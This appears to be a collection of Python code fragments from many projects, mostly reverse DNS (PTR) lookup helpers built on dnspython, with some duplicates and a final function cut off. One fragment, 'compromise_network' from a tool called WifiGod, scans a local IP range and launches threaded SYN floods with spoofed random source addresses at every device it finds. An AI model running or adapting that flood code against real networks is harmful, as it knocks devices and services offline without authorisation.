def main():
output_file_name = "ptr_output"
file = open(f"{output_file_name}.csv", "w", encoding="utf8")
file.write("NAME;MSISDN;IP;ARPA;DOMAIN;NEW_IP;ARPA_NEW;NEW_DOMAIN\n")
with open('ptr_examples.csv', encoding="utf8") as csv_read:
csv_reader = readfile(csv_read)
for row in csv_reader:
try:
rev_addr = reversename.from_address(row["FRAMED-IP-ADDRESS"])
except dnsexception.SyntaxError:
rev_addr = "Null"
try:
new_rev_addr = reversename.from_address(
row["FRAMED-IP-ADDRESS NEW"])
except dnsexception.SyntaxError:
new_rev_addr = "Null"
try:
domain = resolver.query(rev_addr, "PTR")[0]
except resolver.NXDOMAIN:
domain = "NXDOMAIN"
try:
new_domain = resolver.query(rev_addr, "PTR")[0]
except resolver.NXDOMAIN:
new_domain = "NXDOMAIN"
file.write(
f"{row['NAME']};{row['MSISDN']};{row['FRAMED-IP-ADDRESS']};"
f"{rev_addr};{domain};{row['FRAMED-IP-ADDRESS NEW']};{new_rev_addr};{new_domain}\n"
)
file.close()
create_xlsx_copy(output_file_name)
def dns_traffic(interface,ip_address):
while True:
packet = sniff(iface=interface, count=1)
for pck in packet:
if(pck.haslayer(IP)):
ip_src = pck.getlayer(IP).src
ip_dst = pck.getlayer(IP).dst
if(ip_src == ip_address or ip_dst == ip_address):
if(pck.haslayer(DNS)):
try:
hostname = pck.getlayer(DNS).qd.qname
except:
hostname = 'unknown'
if(ip_src != ip_address):
try:
addr = reversename.from_address(ip_src)
server_name = resolver.query(addr, "PTR")[0]
except:
server_name = 'unknown'
elif(ip_dst != ip_address):
try:
addr = reversename.from_address(ip_dst)
server_name = resolver.query(addr, "PTR")[0]
except:
server_name = 'unknown'
if(pck.haslayer(DNS)):
print(c.g+"{}"+c.w+" --> "+c.g+"{}"+c.g+" {} "+c.w+"| Server: "+c.g+"{}"+c.w).format(ip_src,ip_dst,hostname,server_name)
else:
print(c.g+"{}"+c.w+" --> "+c.g+"{}"+c.w+" | Server: "+c.g+"{}"+c.w).format(ip_src,ip_dst,server_name)
def main():
import eventlet
try:
from dns import reversename
except ImportError:
print('skip:require dns (package dnspython)')
return
eventlet.monkey_patch(all=True)
reversename.from_address('127.0.0.1')
print('pass')
def main():
import eventlet
try:
from dns import reversename
except ImportError:
print('skip:require dns (package dnspython)')
return
eventlet.monkey_patch(all=True)
reversename.from_address('127.0.0.1')
print('pass')
def reverse_dns_lookup(ip):
try:
addr = reversename.from_address(ip)
return resolver.query(addr, "PTR")[0]
except Exception as e:
print(e)
return None
def get_dnsname(ipaddress):
myresolve = Resolver()
a = from_address(ipaddress)
name = myresolve.query(a, 'PTR')[0]
return str(name)[:-1]
def resolve_queue_thread(self):
logging.debug('Running resolve queue thread')
while True:
ip_address, cb = self.queue.get(True)
logging.debug('Received request to resolve {}'.format(ip_address))
rev_name = reversename.from_address(ip_address)
try:
hostname = str(resolver.query(rev_name, "PTR")[0])
self.cache[ip_address] = (hostname, 'resolved')
logging.debug('Done resolving! {} --> {}'.format(
ip_address, hostname))
if cb:
cb(ip_address, hostname)
except resolver.NoNameservers:
self.cache[ip_address] = (None, 'bad')
if cb:
cb(ip_address, None)
except dns.resolver.Timeout:
self.cache[ip_address] = (None, 'bad')
if cb:
cb(ip_address, None)
except dns.resolver.NXDOMAIN:
self.cache[ip_address] = (None, 'bad')
if cb:
cb(ip_address, None)
def reverse_lookup(ip):
"""
Résoudre une adresse IP en son nom inversé.
@requires: dnspython3
@param ip: chaîne de type A.B.C.D
@return: dictionnaire aux clés "name" et "status"
"""
address = reversename.from_address(ip)
resolver = dnsresolver.Resolver()
# Configurer le resolver
resolver.timeout = 1.25 # par serveur dns
resolver.lifetime = 3.75 # timeout total
# Demander le RRSet PTR, renvoyer timeout si timeout
try:
ptr_rrset = resolver.query(address, 'PTR').rrset
except dnsresolver.Timeout:
return {'name': '', 'status': STATUS['timeout']}
except dnsresolver.NoAnswer:
return {'name': '', 'status': STATUS['noanswer']}
except dnsresolver.NoNameservers:
return {'name': '', 'status': STATUS['nonameservers']}
except dnsresolver.NXDOMAIN:
return {'name': '', 'status': STATUS['nxdomain']}
# Un Resource Record Set est normalement renseigné
if len(ptr_rrset) > 0:
return {'name': ptr_rrset[0].to_text(), 'status': STATUS['ok']}
# Ce cas ne devrait jamais être atteint
return {'name': '', 'status': 99}
def changeName(self, connection, name):
self.accessLock.acquire()
connectMessages = { \
1: "<links in from Cyan Worlds Age>", \
4: "<links in from Cyan Guest Age>", \
}
if(len(name) < 20 and len(name) > 1 and self.findByName(connection.name[0] + name) == None):
self.debugMsg(connection, "Setting name to '%s' - login - successful" % name)
oldname = connection.name[1:]
wasnamed = connection.named
connection.name = connection.name[0] + name
connection.named = 1
connection.send("11")
if(wasnamed and self.parent.prefs["enable_protocol_extensions"]):
self.sendChat(connection, "<[%s] is now known as [%s]>" % (oldname, name), 2)
elif(connectMessages.has_key(connection.level())):
self.sendChat(connection, connectMessages[connection.level()], 2)
elif(HAS_DNSPYTHON and self.parent.prefs["use_reverse_dns"]):
try:
addr = reversename.from_address(connection.addr[0])
host = '.'.join(str(resolver.query(addr, "PTR")[0]).split('.')[-3:-1])
except:
host = "somewhere on the internet"
self.sendChat(connection, "<links in from %s Age>" % host, 2)
else:
self.sendChat(connection, "<links in from somewhere on the internet Age>", 2)
self.sendUserList()
self.parent.totallogins += 1
if(self.currentlogins() > self.parent.maxlogins):
self.parent.maxlogins = self.currentlogins()
else:
log(self, "rejecting name: %s" % name, 2)
connection.send("10")
self.accessLock.release()
def scan_subnets(subnets):
nmap_args = ["-nsP"] + [item for item in subnets]
vlans = nmap(nmap_args)
ip_patt = '(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'
p = re.compile(ip_patt)
#p.findall(vlans.stdout)
active_ips = p.findall(vlans.stdout)
#storage_ips = [iptools.IpRangeList(subnet) for subnet in subnets]
subnet_ips = {subnet: iptools.IpRangeList(subnet) for subnet in subnets}
ip_usage = {}
for subnet, ip_range in subnet_ips.iteritems():
ip_list = []
for ip in ip_range:
#print ip
try:
host = reversename.from_address(ip)
#in case there are multiple reverse entries for a
#given IP
names = [nm.to_text() for nm in resolver.query(host, 'PTR')]
name = ','.join(names)
except resolver.NXDOMAIN:
name = ''
if ip in active_ips:
ip_list.append([ip, 'ACTIVE', name])
else:
ip_list.append([ip, 'INACTIVE', name])
ip_usage[subnet] = ip_list
return ip_usage
def resolve(self, event, record, host, nameserver):
ipaddr = re.compile(r'\d+\.\d+\.\d+\.\d+')
if not record:
if ipaddr.search(host):
host = from_address(host)
record = 'PTR'
else:
record = 'A'
resolver = Resolver()
if nameserver:
if not ipaddr.search(nameserver):
nameserver = resolver.query(nameserver, 'A')[0].address
resolver.nameservers = [nameserver]
try:
answers = resolver.query(host, str(record))
except NoAnswer:
event.addresponse(
u"I couldn't find any %(type)s records for %(host)s", {
'type': record,
'host': host,
})
return
except NXDOMAIN:
event.addresponse(u"I couldn't find the domain %s", host)
return
responses = []
for rdata in answers:
responses.append(unicode(rdata))
event.addresponse(u'Records: %s', human_join(responses))
def find_dns_cdn(self, domain, depth=0):
"""Recursively check a CNAME chain"""
from dns import resolver, reversename
dns_resolver = resolver.Resolver()
dns_resolver.timeout = 1
provider = self.check_cdn_name(domain)
# First do a CNAME check
if provider is None:
try:
answers = dns_resolver.query(domain, 'CNAME')
if answers and len(answers):
for rdata in answers:
name = '.'.join(rdata.target).strip(' .')
if name != domain:
provider = self.check_cdn_name(name)
if provider is None and depth < 10:
provider = self.find_dns_cdn(name, depth + 1)
if provider is not None:
break
except Exception:
pass
# Try a reverse-lookup of the address
if provider is None:
try:
addresses = dns_resolver.query(domain)
if addresses:
addr = str(addresses[0])
addr_name = reversename.from_address(addr)
if addr_name:
name = str(dns_resolver.query(addr_name, "PTR")[0])
if name:
provider = self.check_cdn_name(name)
except Exception:
pass
return provider
def reverseDns(ip):
try:
rev_name = reversename.from_address(ip)
reversed_dns = str(resolver.query(rev_name, "PTR")[0])
return reversed_dns
except:
return 'N/A'
def name_finder(ip_inner):
try:
rev_name = reversename.from_address(str(ip_inner))
reversed_dns = str(resolver.query(rev_name, 'PTR')[0])
print(ip_inner, " ", reversed_dns)
except:
print(ip_inner, ' dead')
def insert_record(target, record):
"""Add a record."""
name = "Not resolved"
if parameters.get_admin("ENABLE_RLOOKUPS") == "yes":
addr = reversename.from_address(record.source_ip)
try:
resp = resolver.query(addr, "PTR")
node = resp[0].target
while len(node.labels) > 3:
node = node.parent()
name = node
except (resolver.NXDOMAIN, resolver.NoNameservers, resolver.Timeout):
pass
if name not in target:
target[name] = {}
if record.source_ip not in target[name]:
target[name][record.source_ip] = {
"total": 0,
"spf": {"pass": 0, "fail": 0},
"dkim": {"pass": 0, "fail": 0}
}
target[name][record.source_ip]["total"] += record.count
for typ in ["spf", "dkim"]:
result = getattr(record, "{}_result".format(typ))
target[name][record.source_ip][typ][result] += record.count
def scan_subnets(subnets):
nmap_args = ["-nsP"] + [item for item in subnets]
vlans = nmap(nmap_args)
ip_patt = '(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'
p = re.compile(ip_patt)
#p.findall(vlans.stdout)
active_ips = p.findall(vlans.stdout)
#storage_ips = [iptools.IpRangeList(subnet) for subnet in subnets]
subnet_ips = {subnet: iptools.IpRangeList(subnet) for subnet in subnets}
ip_usage = {}
for subnet, ip_range in subnet_ips.iteritems():
ip_list = []
for ip in ip_range:
#print ip
try:
host = reversename.from_address(ip)
#in case there are multiple reverse entries for a
#given IP
names = [nm.to_text() for nm in resolver.query(host, 'PTR')]
name = ','.join(names)
except resolver.NXDOMAIN:
name = ''
if ip in active_ips:
ip_list.append([ip, 'ACTIVE', name])
else:
ip_list.append([ip, 'INACTIVE', name])
ip_usage[subnet] = ip_list
return ip_usage
def get(self, ip):
t1 = time.time()
self.valid_args(ip)
# Iterate through nameservers so that we can tell which one gets used.
nameservers = current_app.config['RESOLVERS']
for nameserver in nameservers:
dns_resolver.nameservers = [nameserver]
try:
# http://stackoverflow.com/a/19867936/1707152
answer = dns_resolver.query(
reversename.from_address(ip), rdatatype.PTR,
raise_on_no_answer=False)
# Successful query
break
except Timeout as e:
# Communication fail or timeout - try next nameserver
if nameserver is nameservers[-1]:
current_app.logger.info(e)
return {'message': 'All nameservers timed out.'}, 503
continue
except NXDOMAIN:
return {'message': 'No nameserver found for %s' % ip}, 404
except Exception as e:
current_app.logger.error(e)
return {'message': 'An unexpected error occured.'}, 500
t2 = time.time()
duration = t2 - t1
if answer is None:
return {'message': 'An unexpected error occured.'}, 500
return parse_query(answer, nameserver, duration)
def _enrich_hosts(self, unique_hosts):
enriched_hosts = []
if self.config.processing.reverse_dns:
d = dns.resolver.Resolver()
d.timeout = 5.0
d.lifetime = 5.0
while unique_hosts:
ip = unique_hosts.pop()
inaddrarpa = ""
hostname = ""
if self.config.processing.reverse_dns:
try:
inaddrarpa = d.query(from_address(ip), "PTR").rrset[0].to_text()
except:
pass
for request in self.dns_requests.values():
for answer in request['answers']:
if answer["data"] == ip:
hostname = request["request"]
break
if hostname:
break
enriched_hosts.append({"ip": ip, "country_name": self._get_cn(ip),
"hostname": hostname, "inaddrarpa": inaddrarpa})
return enriched_hosts
def check_hosting(self):
"""Pull the data needed to determine the hosting"""
start = monotonic.monotonic()
self.hosting_results['base_page_ip_ptr'] = ''
self.hosting_results['base_page_cname'] = ''
self.hosting_results['base_page_dns_server'] = ''
domain = None
if self.task is not None and 'page_data' in self.task and \
'document_hostname' in self.task['page_data']:
domain = self.task['page_data']['document_hostname']
if domain is not None:
try:
from dns import resolver, reversename
dns_resolver = resolver.Resolver()
dns_resolver.timeout = 5
dns_resolver.lifetime = 5
# reverse-lookup the edge server
try:
addresses = dns_resolver.query(domain)
if addresses:
addr = str(addresses[0])
addr_name = reversename.from_address(addr)
if addr_name:
name = str(dns_resolver.query(addr_name, "PTR")[0])
if name:
self.hosting_results[
'base_page_ip_ptr'] = name.strip('. ')
except Exception:
pass
# get the CNAME for the address
try:
answers = dns_resolver.query(domain, 'CNAME')
if answers and len(answers):
for rdata in answers:
name = '.'.join(rdata.target).strip(' .')
if name != domain:
self.hosting_results['base_page_cname'] = name
break
except Exception:
pass
# get the name server for the domain
done = False
while domain is not None and not done:
try:
dns_servers = dns_resolver.query(domain, "NS")
dns_name = str(dns_servers[0].target).strip('. ')
if dns_name:
self.hosting_results[
'base_page_dns_server'] = dns_name
done = True
except Exception:
pass
pos = domain.find('.')
if pos > 0:
domain = domain[pos + 1:]
else:
domain = None
except Exception:
pass
self.hosting_time = monotonic.monotonic() - start
def get(self, ip):
t1 = time.time()
self.valid_args(ip)
# Iterate through nameservers so that we can tell which one gets used.
nameservers = current_app.config['RESOLVERS']
for nameserver in nameservers:
dns_resolver.nameservers = [nameserver]
try:
# http://stackoverflow.com/a/19867936/1707152
answer = dns_resolver.query(reversename.from_address(ip),
rdatatype.PTR,
raise_on_no_answer=False)
# Successful query
break
except Timeout as e:
# Communication fail or timeout - try next nameserver
if nameserver is nameservers[-1]:
current_app.logger.info(e)
return {'message': 'All nameservers timed out.'}, 503
continue
except NXDOMAIN:
return {
'message': 'No nameserver found for the provided IP'
}, 404
except Exception as e:
current_app.logger.error(e)
return {'message': 'An unexpected error occured.'}, 500
t2 = time.time()
duration = t2 - t1
if answer is None:
return {'message': 'An unexpected error occured.'}, 500
return parse_query(answer, nameserver, duration)
def domain_details(domain):
''' Return dictionary of domain name, IP, and reverse DNS'''
details = {}
details['domain'] = domain
details['ip'] = str(socket.gethostbyname(domain))
details['reverse_dns'] = str(reversename.from_address(details['ip']))
return details
def resolve_PTR(ip):
try:
addr = str(reversename.from_address(ip)).rstrip('.')
data = dns.resolver.query(addr, 'PTR')
return data
except:
return None
def reverse_lookup(ip):
try:
return extract_record_data(
prepare_rdata(str(reversename.from_address(ip))),
"PTR").get("PTR")[0]
except Exception as err:
return "ERROR: " + "CANNOT RESOLVE"
def resolve(self, event, record, host, nameserver):
ipaddr = re.compile(r"\d+\.\d+\.\d+\.\d+")
if not record:
if ipaddr.search(host):
host = from_address(host)
record = "PTR"
else:
record = "A"
resolver = Resolver()
if nameserver:
if not ipaddr.search(nameserver):
nameserver = resolver.query(nameserver, "A")[0].address
resolver.nameservers = [nameserver]
try:
answers = resolver.query(host, str(record))
except NoAnswer:
event.addresponse(u"I couldn't find any %(type)s records for %(host)s", {"type": record, "host": host})
return
except NXDOMAIN:
event.addresponse(u"I couldn't find the domain %s", host)
return
responses = []
for rdata in answers:
responses.append(unicode(rdata))
event.addresponse(u"Records: %s", human_join(responses))
def get_hostnames_for_ip (ip):
try:
from dns import reversename, resolver
rev_name = reversename.from_address(ip)
return [str(x) for x in resolver.query(rev_name,"PTR")]
except:
return []
def _url_resolve(self):
if self.initialized:
""" Check the URL typ """
if re.match(ipv4_v2, self.host, re.IGNORECASE):
""" Resolve the IP to a domain """
self.ip = self.host
try:
socket.inet_aton(self.ip)
self.domain = socket.getfqdn(self.ip)
rev_name = reversename.from_address(self.ip)
self.dns_ptr = str(resolver.query(rev_name, "PTR")[0])
except Exception as msg:
return None
elif re.match(domain, self.host, re.IGNORECASE) or re.match(
domain2, self.host, re.IGNORECASE):
self.domain = self.host
try:
self.ip = socket.gethostbyname(self.domain)
except Exception as msg:
return None
else:
logger.error("Unsupported URL: %s" % self.url)
return None
def _enrich_hosts(self, unique_hosts):
enriched_hosts = []
if cfg.processing.reverse_dns:
d = dns.resolver.Resolver()
d.timeout = 5.0
d.lifetime = 5.0
while unique_hosts:
ip = unique_hosts.pop()
inaddrarpa = ""
hostname = ""
if cfg.processing.reverse_dns:
try:
inaddrarpa = d.query(from_address(ip),
"PTR").rrset[0].to_text()
except:
pass
for request in self.dns_requests.values():
for answer in request["answers"]:
if answer["data"] == ip:
hostname = request["request"]
break
if hostname:
break
enriched_hosts.append({
"ip": ip,
"country_name": self._get_cn(ip),
"hostname": hostname,
"inaddrarpa": inaddrarpa
})
return enriched_hosts
def check_hostname(hostname):
log.debug('Checking DNS entry on %s' % hostname)
yandex_family = dns.resolver.Resolver() #
# Yandex family resolvers 77.88.8.7 77.88.8.3
yandex_family.nameservers = ['77.88.8.7', '77.88.8.3']
ips = []
try:
ans = yandex_family.query(hostname, 'A', raise_on_no_answer=False)
ips = [a.to_text() for a in ans]
except dns.exception.DNSException:
pass
# IPanswers = yandex_family.query(hostname, 'A', raise_on_no_answer=False)
log.debug('Found following results %s' % str(ips))
for IP in ips: #for each response
reverse_hostname = ""
# reverse resolve
# Shoud not be safe?.yandex.ru
try:
log.debug('Doing reverse DNS on %s !!' % str(IP))
reverse_hostname = str(
yandex_family.query(reversename.from_address(IP), 'PTR')[0])
except dns.exception.DNSException:
pass
if reverse_hostname:
blocked_result = re.match(r'safe.*\.yandex\.ru', reverse_hostname)
if blocked_result is not None:
log.debug('Hostname %s has do be blocked !!' % hostname)
return False
else:
log.debug('Hostname %s is okay' % hostname)
return True
def getFQDN():
d = open("alive.txt", "w+")
d.write("IP Address\t\tDomain Name\n")
d.write("_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\n")
e = open("sleep.txt", "w+")
e.write("IP Address\t\tDomain Name\n")
e.write("_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\n")
list = []
for line in open('iplist.txt', 'r'):
list.append(line.strip())
print("\nResolving IP addresses...")
x = 0
for ip in list:
try:
addr = reversename.from_address(list[x])
result=str(resolver.query(addr,"PTR")[0])
d.write(list[x] + "\t" + result + "\n")
# print(list[x] + "\t" + result)
x += 1
except:
e.write(list[x] + "\t\t" + "Not Found" + "\n")
# print(list[x] + "\t" + "Not Found")
x += 1
d.close()
e.close()
storage = os.getcwd()
print("\nTask Complete! Results are stored in the following path:\n" + storage + "\n")
def process(self):
event = self.receive_message()
keys = ["source.%s", "destination.%s"]
for key in keys:
ip_key = key % "ip"
if ip_key not in event:
continue
ip = event.get(ip_key)
ip_version = IPAddress.version(ip)
ip_integer = IPAddress.to_int(ip)
if ip_version == 4:
minimum = MINIMUM_BGP_PREFIX_IPV4
elif ip_version == 6:
minimum = MINIMUM_BGP_PREFIX_IPV6
cache_key = bin(ip_integer)[2:minimum + 2]
cachevalue = self.cache.get(cache_key)
result = None
if cachevalue == DNS_EXCEPTION_VALUE:
continue
elif cachevalue:
result = cachevalue
else:
rev_name = reversename.from_address(ip)
try:
results = resolver.query(rev_name, "PTR")
expiration = results.expiration
for result in results:
# use first valid result
if event.is_valid('source.reverse_dns', str(result)):
break
else:
raise InvalidPTRResult
except (dns.exception.DNSException, InvalidPTRResult) as e:
# Set default TTL for 'DNS query name does not exist' error
ttl = None if isinstance(e, dns.resolver.NXDOMAIN) else \
getattr(self.parameters, "cache_ttl_invalid_response",
60)
self.cache.set(cache_key, DNS_EXCEPTION_VALUE, ttl)
result = None
else:
ttl = datetime.fromtimestamp(expiration) - datetime.now()
self.cache.set(cache_key,
str(result),
ttl=int(ttl.total_seconds()))
if result is not None:
event.add(key % 'reverse_dns', str(result), overwrite=True)
self.send_message(event)
self.acknowledge_message()
def compromise_network():
interface = raw_input("Network Interface: ")
print("Net Range Example: 192.168.1.0-255")
net_range = raw_input("Net Range: ")
start_ip = net_range.split('-')[0]
end_range = net_range.split('-')[1]
octet_count = 0
ip_base = ''
live_ip_addr = []
for octet in start_ip:
if(octet == '.'):
octet_count += 1
if(octet_count == 3):
ip_base += octet
break;
ip_base += octet
for ip_addr in range(int(end_range)+1):
try:
socket.gethostbyaddr(ip_base+str(ip_addr))
live_ip_addr.append(ip_base+str(ip_addr))
try:
addr = reversename.from_address(ip_base+str(ip_addr))
device_hostname = resolver.query(addr, "PTR")[0]
except:
device_hostname = '(unknown)'
print("[WifiGod] Found Device: {} | {}").format(ip_base+str(ip_addr), device_hostname)
except:
pass
print("[WifiGod] Found {} Devices").format(len(live_ip_addr))
def attack_net(device,interface):
try:
payload = str("A" * 1000)
packet = IP(src=RandIP(),dst=device)/TCP(flags="S",sport=RandShort(),dport=RandShort())/payload
sendp(packet,iface=interface,loop=1,verbose=False)
except:
pass
# def attack_net(device):
# try:
# while True:
# payload = str("A" * 5000)
# sock=socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.SOCK_DGRAM)
# sock.sendto(payload, (device,RandShort()))
# except:
# raise
print("[WifiGod] Initiating Attack...")
# live_ip_addr = ['192.168.1.1']
for ip in live_ip_addr:
try:
# for i in range(10):
t =threading.Thread(target=attack_net,args=(ip,interface))
t.setDaemon(True)
t.start()
except:
pass
x = raw_input("[WifiGod] Press Enter to stop...")
try:
exit(0)
except:
sys.exit(1)
def process(self):
event = self.receive_message()
if event is None:
self.acknowledge_message()
return
keys = ["source.%s", "destination.%s"]
for key in keys:
ip_key = key % "ip"
if not event.contains(ip_key):
continue
ip = event.value(ip_key)
ip_version = IPAddress.version(ip)
ip_integer = IPAddress.to_int(ip)
if ip_version == 4:
minimum = MINIMUM_BGP_PREFIX_IPV4
elif ip_version == 6:
minimum = MINIMUM_BGP_PREFIX_IPV6
else:
self.logger.error("Invalid IP version {!r}".format(ip_version))
self.send_message(event)
self.acknowledge_message()
cache_key = bin(ip_integer)[2:minimum + 2]
cachevalue = self.cache.get(cache_key)
result = None
if cachevalue:
result = cachevalue
else:
rev_name = reversename.from_address(ip)
try:
result = resolver.query(rev_name, "PTR")
expiration = result.expiration
result = result[0]
except dns.exception.DNSException as e:
if isinstance(e, dns.resolver.NXDOMAIN):
continue
else:
ttl = datetime.fromtimestamp(expiration) - datetime.now()
self.cache.set(cache_key,
str(result),
ttl=int(ttl.total_seconds()))
if result is not None:
event.add(key % 'reverse_dns',
str(result),
sanitize=True,
force=True)
self.send_message(event)
self.acknowledge_message()
def rev_dns_lookup(ip_address):
addr = reversename.from_address(ip_address)
resolved_ip = resolver.query(addr, "PTR")[0]
if resolved_ip:
print(str(resolved_ip))
return resolved_ip
else:
return False
def getptr(ip):
domain_address = reversename.from_address(ip)
try:
domain_name = resolver.resolve(domain_address, 'PTR')
answer = domain_name.response.answer[0]
except:
answer = []
return answer
def ptr_lookup(ip):
# reverse DNS lookup
rev_ip = reversename.from_address(ip)
try:
return str(dns_resolver.query(rev_ip, "PTR")[0])
except (resolver.NXDOMAIN, resolver.Timeout, resolver.NoAnswer,
IndexError):
return "<no ptr>"
def getRDNS(ip):
try:
rev_name = reversename.from_address(ip)
reversed_dns = str(resolver.query(rev_name, "PTR")[0])
except:
reversed_dns = "Unknown"
return reversed_dns
def get_hostname(self,ip):
try:
rev_name = reversename.from_address(ip)
result = self.query(rev_name,"PTR").__iter__().next().to_text()[:-1]
return "%s: %s\n"%(ip,result)
except resolver.NXDOMAIN: return "%s: NXDOMAIN\n"%(ip)
except exception.Timeout: return "%s: TIMEOUT\n"%(ip)
except: return "%s: UNSPECIFIED ERROR\n"%(ip)
def process(self):
event = self.receive_message()
keys = ["source.%s", "destination.%s"]
for key in keys:
ip_key = key % "ip"
if ip_key not in event:
continue
ip = event.get(ip_key)
ip_version = IPAddress.version(ip)
ip_integer = IPAddress.to_int(ip)
if ip_version == 4:
minimum = MINIMUM_BGP_PREFIX_IPV4
elif ip_version == 6:
minimum = MINIMUM_BGP_PREFIX_IPV6
cache_key = bin(ip_integer)[2: minimum + 2]
cachevalue = self.cache.get(cache_key)
result = None
if cachevalue == DNS_EXCEPTION_VALUE:
continue
elif cachevalue:
result = cachevalue
else:
rev_name = reversename.from_address(ip)
try:
results = resolver.query(rev_name, "PTR")
expiration = results.expiration
for result in results:
# use first valid result
if event.is_valid('source.reverse_dns', str(result)):
break
else:
raise InvalidPTRResult
except (dns.exception.DNSException, InvalidPTRResult) as e:
# Set default TTL for 'DNS query name does not exist' error
ttl = None if isinstance(e, dns.resolver.NXDOMAIN) else \
getattr(self.parameters, "cache_ttl_invalid_response",
60)
self.cache.set(cache_key, DNS_EXCEPTION_VALUE, ttl)
result = None
else:
ttl = datetime.fromtimestamp(expiration) - datetime.now()
self.cache.set(cache_key, str(result),
ttl=int(ttl.total_seconds()))
if result is not None:
event.add(key % 'reverse_dns', str(result), overwrite=True)
self.send_message(event)
self.acknowledge_message()
def get_server_public_fqdn():
try:
reslvr = resolver.Resolver()
ipaddr = reversename.from_address(get_server_external_ip())
return str(reslvr.query(ipaddr, 'PTR')[0]).rstrip('.').lower()
except Exception, e:
web.debug('DEBUG: get_server_public_fqdn(): %s' % repr(e))
return ipaddr
def doReverseLookup(self, ip_address):
#started = time.time()
try:
hostname = str(self.caller.resolver.query(reversename.from_address(ip_address), "PTR")[0])
except:
hostname = None
#if (time.time() - started) > 1:
# print("Reverse lookup of %s(%s) took %s." % (ip_address, hostname, time.time() - started))
return hostname
def reverse_dns(ip):
addr = reversename.from_address(ip)
try:
dns_name = resolver.query(addr, 'PTR')[0]
except:
dns_name = None
return str(dns_name)
def process_mail(dict_general, temp_set, settings):
"""process_mail
Arguments:
dict_general {defaultdict(set)} -- Dictionary of sets
dict_general[mail_user].(mail_ip_addresses)
temp_set {set} -- Set with email addresses that authenticated from more than one ip
settings {object} -- Settings from the class Config
"""
# pylint: disable=too-many-locals
country_ignore = list(settings.country_ignore.split('\n'))
pattern_org = list(settings.pattern_org.split('\n'))
pattern_ip = list(settings.pattern_ip.split('\n'))
dict_issues = defaultdict(list)
for email_address in temp_set:
logging.debug('Start processing email: %s', email_address)
temp_list = []
for ip_address in dict_general[email_address]:
# Check dns reverse name from the ip address
rev_name = reversename.from_address(ip_address)
try:
reverse_dns = str(resolver.query(rev_name, "PTR", lifetime=2)[0])
except dns_exception.DNSException:
reverse_dns = 'unknown'
logging.debug(' IP: %s - Reverse: %s', ip_address, reverse_dns)
# Request geoip from the not skipped ip addresses with dns reverse name
if not check_ip_on_whitelist(reverse_dns, pattern_ip):
json_ip = check_geoip(ip_address, settings.ipinfo_token)
if 'bogon' not in json_ip:
country = json_ip['country']
city = json_ip['city']
org = json_ip['org']
else:
# IP Invalid/Bogon
continue
logging.debug(' Contry: %s - %s - %s', country, city, org)
if country not in country_ignore:
if not check_org_on_whitelist(org, pattern_org):
# pylint: disable=C0301
temp_list.append(f'{country} - {city} - {ip_address} - {reverse_dns} - {org}')
else:
logging.debug(' %s skipped', country)
if len(temp_list) > 1:
dict_issues[email_address] = temp_list
return dict_issues
def get_server_public_fqdn():
try:
reslvr = resolver.Resolver()
ipaddr = reversename.from_address(get_server_external_ip())
return str(reslvr.query(ipaddr, 'PTR')[0]).rstrip('.').lower()
except Exception, e:
web.debug('DEBUG: get_server_public_fqdn(): %s' % repr(e))
return ipaddr
def process(self):
event = self.receive_message()
if event is None:
self.acknowledge_message()
return
keys = ["source.%s", "destination.%s"]
for key in keys:
ip_key = key % "ip"
if not event.contains(ip_key):
continue
ip = event.value(ip_key)
ip_version = IPAddress.version(ip)
ip_integer = IPAddress.to_int(ip)
if ip_version == 4:
minimum = MINIMUM_BGP_PREFIX_IPV4
elif ip_version == 6:
minimum = MINIMUM_BGP_PREFIX_IPV6
else:
self.logger.error("Invalid IP version {!r}".format(ip_version))
self.send_message(event)
self.acknowledge_message()
cache_key = bin(ip_integer)[2: minimum + 2]
cachevalue = self.cache.get(cache_key)
result = None
if cachevalue:
result = cachevalue
else:
rev_name = reversename.from_address(ip)
try:
result = resolver.query(rev_name, "PTR")
expiration = result.expiration
result = result[0]
except dns.exception.DNSException as e:
if isinstance(e, dns.resolver.NXDOMAIN):
continue
else:
ttl = datetime.fromtimestamp(expiration) - datetime.now()
self.cache.set(cache_key, str(result),
ttl=int(ttl.total_seconds()))
if result is not None:
event.add(key % 'reverse_dns',
str(result), sanitize=True, force=True)
self.send_message(event)
self.acknowledge_message()
def ptr_lookup(ip):
# reverse DNS lookup
rev_ip = reversename.from_address(ip)
try:
return str(dns_resolver.query(rev_ip,"PTR")[0])
except (resolver.NXDOMAIN,
resolver.Timeout,
resolver.NoAnswer,
IndexError):
return "<no ptr>"
def lookup(host):
ip = IP(host)
addr = reversename.from_address(str(ip))
try:
return str(resolver.query(addr, "PTR")[0]).rstrip(".")
except (resolver.NoAnswer, resolver.NXDOMAIN):
if ip.iptype() == "IPV4MAP":
return str(ip.v46map())
return str(ip)
def _ptr_lookup(self):
ptraddr = reversename.from_address(self.address[0])
try:
answers = resolver.query(ptraddr, 'PTR')
except DNSException:
answers = []
try:
self.reverse_address = str(answers[0])
except IndexError:
pass
def lookup_reverse(ip_address):
"""Perform a reverse lookup of IP address."""
try:
type(ipaddress.ip_address(ip_address))
except ValueError:
return {}
record = reversename.from_address(ip_address)
hostname = str(resolver.query(record, "PTR")[0])[:-1]
return {'hostname': hostname}
def reverse(cls, address):
if not cls.resolver:
cls.resolver = resolver.Resolver()
cls.resolver.nameservers = ['8.8.8.8', '8.8.4.4']
rev_name = reversename.from_address(address.strip())
print rev_name
response = cls.resolver.query(rev_name, "PTR", raise_on_no_answer=True)
return str(response[0])
def get_ip(source_field, values):
"""
Método que permite extraer información de la ip del log desde el propio sistema
o obteniendola de la red.
Args:
source_field: Parametro que concierne al tipo de campo (IP,MAC,PORT,MSG)
values: Objeto string que representa una fila del log leido
Returns: La insercion de la informacion de IP en la BD y como resultado el identificador de la fila insertada
"""
ips_objects = Ips.objects.all()
ip = (((re.compile(source_field + '=\S+')).search(values)).group(0)).split(source_field + '=')[1].strip("',")
id_ip = 0
for it in ips_objects:
if it.Ip == ip:
id_ip = it
# Aquí lo que hago es comprobar si existe una ip similar en la
# tabla. Si no existe se inserta un nuevo registro de ip en la tabla.
if not id_ip:
hostname = '-'
try:
hostname, aliaslist, ipaddrlist = socket.gethostbyaddr(ip)
except socket.error as msg:
print "Get_ip -> ", msg
try:
address_dns = reversename.from_address(str(ip))
